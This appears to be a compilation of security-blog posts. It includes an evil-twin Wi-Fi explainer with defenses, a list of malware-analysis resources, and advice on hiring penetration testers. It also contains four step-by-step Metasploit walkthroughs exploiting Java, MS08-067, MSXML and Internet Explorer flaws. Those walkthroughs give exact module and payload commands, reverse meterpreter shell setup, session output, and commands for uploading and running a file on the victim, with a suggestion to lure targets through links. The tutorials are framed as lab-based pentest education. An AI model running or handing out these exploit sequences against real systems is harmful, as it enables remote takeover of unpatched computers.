Evil Twin and Fake Wireless Access Point Hacks: What They Are, How To Defend

evil-twin-attack-fake-wifi-access-point

Hacking is a term with a wide variety of acts associated with it. Some are incredibly complex and demand a high degree of knowledge, others are little more than installing some software on your device and acting a bit…less than ethically.

One of the most common hacks is also one of the easiest to defend against. This is what is known as a fake wireless access point. Hackers use this tactic to easily steal data of unsuspecting wireless users in public places.

What is a fake wireless access point data theft?
This type of attack has a number of nicknames associated with it: AP Phishing, Wi-Fi Phishing, Hotspotter, Evil Twins, and Honeypot AP. All of these are associated with creating a fake Wi-Fi connection that people log into, and whose goal is to steal credentials, logins, and passwords.

To accomplish this, hackers simply use a piece of software, or app, that is designed to capture data that is sent over a wireless connection. Examples of software that is sued during a fake Wi-Fi attack includes:

  • AirSSL
  • AirJack
  • Airsnarf
  • Dsniff
  • Cain
  • void11

No matter which apps are used, the key to it all is setting up a wireless connection that people will want to connect to. When they go to connect to the wireless point they likely won’t suspect a thing. Why? Because this tactic is used most often in public areas.

If you were to go into your local Starbucks, sit down with your mochalatte venti with cream and sugar pumpkin spice, and open up your tablet, finding a connection labelled ‘Starbucks Free WiFi,’ you’d probably connect in a heartbeat (on which is quicken by caffeine, at that). The same goes if you’re on a layover at JFK and you see a connection labelled ‘JFK Free Wi-Fi.- You wouldn’t think twice. That’s what the hackers are counting on – you not thinking.

How is your data stolen during a fake wireless access point theft?
How your most important data is stolen is a little shocking – you give it to them. A large percentage of these hacks take place with a fake wireless point that requires a login and password. Once that information is put into the login, hackers will take it and use it to sign into popular websites, assuming that you use the same login and password for multiple sites.

When your online accounts start showing charges that you didn’t initiate, or if your social media account is taken over, you could be the victim of a fake wireless access point data theft.

How to defend against an ‘Evil Twin’ attack?
There are a number of ways to defend against it, I’ll look at some easy to understand examples:

  • The best defence is to always verify with the wifi provider. Ask the Starbucks staff what their wi-fi is called, it can save you a massive headache. Always remember – if a deal seems too good to be true, like free wifi, it probably is.
  • Use different login details and passwords for public wifi.
    Disconnect auto-connect when you’re in unfamiliar territory.
  • Be cautious when connects suddenly disconnect, especially if it happens for everyone on the network. An app known as aireplay is capable of disconnecting users from wifi, hoping that they’ll reconnect to their fake wifi.
  • Be cautious of certificates. Good websites can occasionally send you one, but if this happens over a public wifi that you don’t know, it is best to back off.
  • If a wifi hotspot is interfering with your VPN, forcing you to shut it down, that is a HUGE red flag. A VPN is a great defence against this attack, and hackers know it. Forcing your VPN to disable when you’re trying to connect is the only way that they can steal your data.

That last point is one I want to look at further. A VPN can be a great defence against this type of attack because it encrypts all of the data that you send out. With this data being encrypted, even when you create your login and password with the fake wifi, your data can not be stolen because it can not be deciphered. We review our Top 10 VPNs over on our website if you’re interested in learning more about them.

A last option that I’ll suggest is using SSL-protected apps. These do take more care and thought to use, but they will offer you protection that is similar to a VPN. Some hackers have even found a way around SSL protection ( the BREACH method), so you may want to explore using this with a secondary defensive measure.

The overall advice is to be cautious and verify before you connect. People look at me weird all the time when I ask for the correct wifi name that I should use to connect to. I’ve never been the victim of an ‘Evil Twin’ attack…I’ll take a funny look or two!

This is Guest Post from “Marcus Habert”.

Javascript static analysis with IronWASP-Lavakumar, nullcon Goa 2012

Description: From its humble beginnings many years ago, JavaScript has been steadily evolving and has now become a powerful and popular language, especially with HTML5. It is not uncommon to see Web Applications that contain more lines of JavaScript code in them than the number of lines of server-side code. In the HTML5 and mash-up world there are a lot of critical features being implemented on the client-side with JavaScript. All this additional power does come with its security implications. It is absolutely essential that JavaScript code is tested for all of the known client-side vulnerabilities. Testing JavaScript for vulnerabilities is still a relatively new art and there are very few tools available for the same. In this talk you will learn about the various JavaScript related vulnerabilities to look out for, the techniques to test for them and how IronWASP can be used to perform JavaScript vulnerability hunting with relative ease.

Download IronWASP from here: IranWASP

<-- adsense -->

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution



CVE-2012-1723: This is a vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )

Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type “msfupdate” , this will update the metasploit with latest modules.
Now type “msfconsole” to get interaction with the Metasploit framework.

Step 2:
Type “use exploit/multi/browser/java_verifier_field_access” and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don’t know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type “sessions“, this will show the list of active sessions .

Type “sessions -i 1“, this will open the connection to the session with the id ‘1’ and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:

  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/

[Metasploit Tutorial] Hacking Windows XP using IP Address

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don’t believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely “Target” and “BT5″.  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don’t know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type “nmap -O 192.168.56.12“.  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.

Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type “msfconsole“.

The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type “search netapi”.  Now you can see the list of modules match with the netapi.

We are going to exploit MS08-067 , so type “use exploit/windows/smb/ms08_067_netapi“.

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.

Step 6: Options
Type “set LHOST 192.168.56.10“.  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing ‘ifconfig’ command in the Terminal.

Type “set RHOST 192.168.56.12“.  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing “screenshot” will grab the screenshot of the victim system.

CounterMeasures:
Update your OS frequently.

List of Best sites to learn Malware Analysis

are you interested to learn Malware analysis and searching for the best resources?! Ok , i will give the list of sites where you can learn the malware analysis.

Resources for learning Malware Analysis

Malware Analysis Tutorials: a Reverse Engineering Approach
A series of Malware analysis tutorial written by Dr. Xiang Fu. In this blog, you will learn how to setup your malware analysis lab and do code analysis part using Immunity Debugger.

Link: Dr. Fu’s Security Blog

Step-by-Step Reverse Engineering Malware: ZeroAccess / Max++ / Smiscer Crimeware Rootkit:
This four part article series is a complete step-by-step tutorial on how to reverse engineer the ZeroAccess Rootkit.
Link: InfoSec Institute

Practical Malware Analysis Tutorials
This page contains series of malware analysis tutorial that demonstrate how to dissect the different malware samples.

Link: Tutorial from Malware.lu

Sinowal analysis:
The full analysis report of Sinowal. Sinowal (also known as Torpig or Anserin) is constant one of the top banking trojan all over the world since 2006.
Link: http://www.evild3ad.com/?p=1556

Analysis of Shylock Trojan:
Shylock is a new Trojan discovered by trusteer around 2 months ago. It is designed to be a Trojan Spy and specifically a Banker. Targets the windows platform, collects various system information from the infected system and send it to a remote C&C server, able to perform Man in the Browser attacks (IE and FF) against users of UK banks.
Link: http://p4r4n0id.com/

Malware Analysis Video Tutorial for Beginners

Learn malware analysis fundamentals from the primary author of SANS’ course FOR610: Reverse-Engineering Malware (REM). More at LearnREM.com.

In this session, Lenny Zeltser will introduce you to the process of reverse-engineering malicious software. He will outline behavioral and code analysis phases, to make this topic accessible even to individuals with a limited exposure to programming concepts. You’ll learn the fundamentals and associated tools to get started with malware analysis.

You can download the speaker’s slides, complete with full notes here: zeltser.com/reverse-malware/intro-to-malware-analysis.pdf  These slides are also useful when you cannot see full details on your screen while watching the video.

Leny Zeltser teaches a popular malware analysis course at SANS Institute. He has helped IT administrators, security professionals, and malware specialists fight malicious code in their organizations.

Finding a Qualified Penetration Tester for Your Site

The penetration testing industry is enjoying an upsurge as more high-profile security breaches are reported in the media, such as the recent LinkedIn password debacle, and companies scramble to tighten up their systems. Done correctly, pen testing can illuminate security flaws in a network by utilizing the skills and viewpoint of an external third party, which in most cases, to be frank, is a great hacker.

It is the classic case of thinking like a criminal in order to catch one. A penetration tester should not be culled from the ranks of your average computer science major or CIO, as they lack the necessary “underground” experience and mentality to truly think the way professional exploiters do.

So what qualities should be looked for in a penetration tester, to find one that will think like a criminal without actually being one? Here are some hallmarks.

Extreme intelligence and problem-solving skills

A good penetration tester must be able to take disparate or incomplete data sets and, from them, fill in the gaps to discern possible attack vectors and approaches. Linear thinking is not enough — the thought process of a pen tester should allow him to take one piece of data and figure out all the ways that data can be applied in conjunction with other, seemingly unrelated data. This requires a high I.Q. and a tremendous amount of persistence.

Thinking outside the box

As security methods increase in sophistication, pen testers should be able to adapt and explore non-obvious ways to penetrate a system. This includes phishing and social engineering attacks against live staff to test real-world vulnerabilities. One could conceivably go so far as to walk around an office at night, as if one were a janitor, to discover whether login information is available on yellow Post-Its stuck on monitors.
Furthermore, thinking outside the box is required for a tester to come up with new attacks, rather than simply Google existing ones like a script kiddie.

Understands the end goal

Penetration testers should keep in mind that the end goal is not bragging rights or the simple thrill of popping a target box, but to improve the enterprise’s security protocols to protect both it, and potentially millions of customers, from financial or privacy loss. As there are usually time and budget concerns, the pen tester should therefore focus on discovering the critical vulnerabilities with the highest potential impact first, then move on to secondary and tertiary layers of vulnerability.

As such, they need to demonstrate the ability to see the big picture of why a system would be attacked and what the intruder would be trying to achieve once they gain a foothold. Compromising one machine on a network would not be enough; the attack should be carried out until all further vulnerabilities now possible from that one compromised box are discovered — especially ones that lead to social security numbers, bank account information, or trade secrets — which are the areas a hacker group would most likely be targeting.

Solutions-oriented

It is not enough to infiltrate a system and report the findings. The true value of a penetration tester lies in his or her ability to provide recommendations to fix all vulnerabilities found. It is here where the hacker hat is taken off and replaced with the consultant hat to advise on the best possible solutions to lock down a network.

Pen testers should also offer follow-up tests or provide means for in-house IT staff to verify holes have been patched.

Communication skills

Lastly, a pen tester must be able to communicate in non-technical terms to executives and others reading the final report. Complex jargon and scripting recommendations should be reserved for the enterprise’s IT staff, coming after a plain English summary with illustrative graphics and charts that your average business person can grasp. Try reading a sample report from the tester and seeing if you can make heads or tails from it. If not, move on.

Penetration testing is intensive work. Anyone can use software to scan for common vulnerabilities, but only a real pro can go beyond the automated tests and delve into the nooks and crannies, just like a live, criminal hacker gang would.

Author Bio

John Dayton is a freelance writer who contributes to LWG Consulting, a company that provides forensic consulting services, including computer security.

CVE-2012-1889: Microsoft XML Core Services Vulnerability Metasploit Demo

CVE-2012-1889: Microsoft XML Core Services Vulnerability
A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer.

An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker’s website.

The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list.

The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.

I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not.

Open the Terminal and type “msfupdate” to get the latest metasploit modules. Once update is finished, then type “msfconsole“.

Then type the following command in the console “use exploit/windows/browser/msxml_get_definition_code_exec“.

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type “show options” in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the “ifconfig” in the terminal.

Command: set lhost 192.168.56.10

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:

set payload windows/meterpreter/reverse_tcp

Type “exploit” in the console.

Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] msxml_get_definition_code_exec – Using msvcrt ROP

[*] msxml_get_definition_code_exec – 10.0.1.79:1564 – Sending html

[*] Sending stage (752128 bytes) to 192.168.56.12

[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565)

Type “sessions” to list the active sessions . Type “sessions -i 1″, this will open the connection to the session with the id ‘1’ and bring you to Meterpreter.

Type “sysinfo” in the meterpreter to get the system information.

CVE-2012-1875 : Hacking windows using MS12-037 Internet Explorer Same ID Vulnerability

Hi, Today i am going to explain how to hack the Windows system using the recent IE exploit.  This article is intend to educate PenTesters.  If you don’t know what Penetration testing means, then please reads this article.  Also please read the previous articles on Pen Testing.

CVE-2012-1875 : MS12-037 Internet Explorer Same ID Vulnerability

Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka “Same ID Property Remote Code Execution Vulnerability.

Two technologies in modern OS are used to make exploits of this sort harder: DEP (data execution prevention) and ASLR (address-space layout randomisation).

DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (wiki)

ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for hackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().

But DEP and ASLR don’t make remote code execution attacks impossible -just trickier.

In the case of CVE-2012-1875, ASLR can be bypassed by trying to force Internet Explorer to find and load an old version of the Microsoft C runtime DLL – one which was compiled before ASLR become the norm, and
therefore doesn’t support it. Whenever you load a non-ASLR DLL, even into an ASLR-enabled program, you can predict where it will end up.

And DEP is bypassed using a technique known as ROP, or return-oriented programming.

Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875 ):

Requirements:

  • Target OS: XP3
  • Attacker OS : Backtrack or any PenTesting Distros

As usual , you have to create two VMs in your VirtualBox.

Preparing victim system:
Install the XP3 in one of the VM.  Change the VM’s Network adapter to the Host-only-adapter. (if you don’t know what i am talking about, then please use this Virtualbox manual)

Preparing the Attacker system:
Update the Metasploit modules by entering the following command in Terminal:
msfupdate

Or you can download the ‘ms12_037_same_id.rb‘ module and paste in this directory “/opt/metasploit/msf3/modules/exploits/windows/browser/

Configuring settings for the exploit in Metasploit:
Open the Terminal and type “msfconsole” to get the Metasploit console.

Type ” use exploit/windows/browser/ms12_037_same_id” in the console.

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type “show options” in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the “ifconfig” in the terminal.

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:

set payload windows/meterpreter/reverse_tcp

Ok, let us launch the exploit.

Type “exploit” in the console.

Now the exploit is started. Our exploit is running at “http://192.168.56.10:8080/”.

Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685)

Type “sessions” to list the active sessions . Type “sessions -i 1″, this will open the connection to the session with the id ‘1’ and bring you to Meterpreter.

Now , You can control the victim system from computer using meterpreter.

For example:

‘upload /Test.exe c:\”, this command will upload the Test.exe from the root(‘file system’ dir) folder of the BT5 to the C drive of the Target.

‘execute -f C:\Test.exe”, this command will run our uploaded File in the Target.